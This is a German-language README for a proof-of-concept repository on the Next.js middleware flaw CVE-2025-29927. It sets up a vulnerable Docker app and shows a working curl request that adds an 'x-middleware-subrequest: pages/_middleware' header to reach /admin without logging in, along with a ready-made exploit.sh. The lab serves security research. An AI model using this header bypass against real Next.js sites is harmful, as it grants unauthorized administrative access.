
Forschung zur Next.js-Middleware-Sicherheitslücke (CVE-2025-29927), die eine Autorisierungsumgehung und potenzielle Exploits ermöglicht.
Dieses Repository zeigt eine kritische Schwachstelle in Next.js Middleware (CVE-2025-29927), die die Versionen 11.1.4 bis 15.1.7 betrifft. Diese Schwachstelle ermöglicht Autorisierungsumgehung, CSP-Umgehung und potenzielle DoS-Angriffe durch Cache-Vergiftung. Das Problem liegt in der Art und Weise, wie der x-middleware-subrequest-Header behandelt wird, was Angreifern erlaubt, Middleware-Schutzmechanismen zu umgehen.
Dieser Proof of Concept ist spezifisch für die Schwachstelle in v12
Richten Sie die anfällige Umgebung mit Docker und den Dateien aus diesem Repository ein, indem Sie Folgendes ausführen:
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app
Dieses Repository enthält das bereits erstellte Skript exploit.sh, um die Ausnutzung der Schwachstelle zu testen. Um es zu testen, führen Sie Folgendes aus:
chmod +x exploit.sh
./exploit.sh
Zusätzlich können Sie die Ausnutzung der Schwachstelle testen, indem Sie Folgendes versuchen:
login-Seite erhalten.curl -i http://localhost:3000/admin
x-middleware-subrequest-Header. Sie sollten in der Lage sein, die Authentifizierungsseite zu umgehen.curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin